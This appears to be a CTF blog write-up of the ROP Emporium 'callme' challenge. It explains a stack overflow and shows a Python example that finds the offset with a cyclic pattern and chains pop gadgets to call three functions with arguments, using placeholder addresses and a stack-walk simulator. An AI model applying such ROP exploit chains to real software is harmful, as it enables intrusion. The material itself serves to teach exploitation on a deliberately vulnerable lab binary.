ropemporium - challenge 3 'callme'
Now it’s time to call some functions with multiple arguments.
Screenshot: gdb session (image not preserved).
As we can see, we again overflow the read in the pwnme function and ROP our way through the three functions, as demanded in the challenge description.
Here we can see the gadgets we need. We could use pop rdi; pop rsi; pop rdx; ret; for the easiest and shortest chain, but I chose to split it into two gadgets.
Our final exploit once again automates the offset-finding, uses hardcoded addresses of the required functions, and delivers the arguments via ROP-chaining: the given gadgets set the argument registers, and then the required functions are called.
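To make the two steps above concrete (finding the offset with a cyclic pattern, then laying out register-setting gadgets before each function address), here is an added example that is not the original exploit script. All addresses, the offset and the argument values are constructed placeholders, not the real callme binary's values; the stack walk at the end is a small model of what the CPU does when it `ret`s through the chain, which is what makes the register/argument ordering visible without running anything.

```python
import struct

# Constructed placeholder values: the real ROP Emporium callme binary has its
# own gadget/function addresses and offset; these exist only so the example runs.
POP_RDI_RET = 0x40093C          # hypothetical 'pop rdi; ret' gadget
POP_RSI_POP_RDX_RET = 0x40093E  # hypothetical 'pop rsi; pop rdx; ret' gadget
FUNCS = {"callme_one": 0x400720, "callme_two": 0x400740, "callme_three": 0x400760}
ARGS = (0x1111, 0x2222, 0x3333)  # constructed argument triple (rdi, rsi, rdx)
ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def p64(value):
    """Pack one little-endian 64-bit stack word."""
    return struct.pack("<Q", value)


def de_bruijn(k, n):
    """Standard FKM de Bruijn sequence: every length-n window over k symbols is unique."""
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return seq


def cyclic(length):
    """Pattern whose every 4-byte window is unique, so a crash value maps to one offset."""
    return "".join(ALPHABET[i] for i in de_bruijn(len(ALPHABET), 4))[:length]


def find_offset(pattern, word_at_saved_rip):
    """Given the 8-byte word that landed in the saved-RIP slot, return its offset."""
    return pattern.find(p64(word_at_saved_rip)[:4].decode())


def build_chain(offset, func_addrs, args):
    """Padding, then per function: set rdi, set rsi+rdx, call the function."""
    payload = b"A" * offset
    for func in func_addrs:
        payload += p64(POP_RDI_RET) + p64(args[0])
        payload += p64(POP_RSI_POP_RDX_RET) + p64(args[1]) + p64(args[2])
        payload += p64(func)
    return payload


def simulate(payload, offset):
    """Model 'ret' walking down the chain: gadgets pop their registers, each function
    records (name, rdi, rsi, rdx) and returns into the next stack word."""
    words = [struct.unpack("<Q", payload[i:i + 8])[0]
             for i in range(offset, len(payload), 8)]
    by_addr = {addr: name for name, addr in FUNCS.items()}
    regs = {"rdi": None, "rsi": None, "rdx": None}
    calls, sp = [], 0
    while sp < len(words):
        rip, sp = words[sp], sp + 1
        if rip == POP_RDI_RET:
            regs["rdi"], sp = words[sp], sp + 1
        elif rip == POP_RSI_POP_RDX_RET:
            regs["rsi"], regs["rdx"], sp = words[sp], words[sp + 1], sp + 2
        elif rip in by_addr:
            calls.append((by_addr[rip], regs["rdi"], regs["rsi"], regs["rdx"]))
        else:
            raise ValueError(f"stack word {rip:#x} is neither a known gadget nor a function")
    return calls


def demo():
    # Constructed crash: pretend the saved-RIP slot held pattern bytes 40..48.
    pattern = cyclic(200)
    offset = find_offset(pattern, int.from_bytes(pattern[40:48].encode(), "little"))
    order = [FUNCS["callme_one"], FUNCS["callme_two"], FUNCS["callme_three"]]
    payload = build_chain(offset, order, ARGS)
    return offset, len(payload), simulate(payload, offset)


if __name__ == "__main__":
    print(demo())
```

The walk shows why the gadget order matters: each `pop` consumes the word directly below it, so the argument words must sit immediately after their gadget, and each function address is reached by the preceding gadget's `ret` and returns into the next gadget. The model ignores stack alignment and anything the functions do internally, so it is a layout check, not a substitute for running the binary under gdb.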
Conclusion
Now it’s looking more like rop!
This post is licensed under CC BY 4.0 by the author.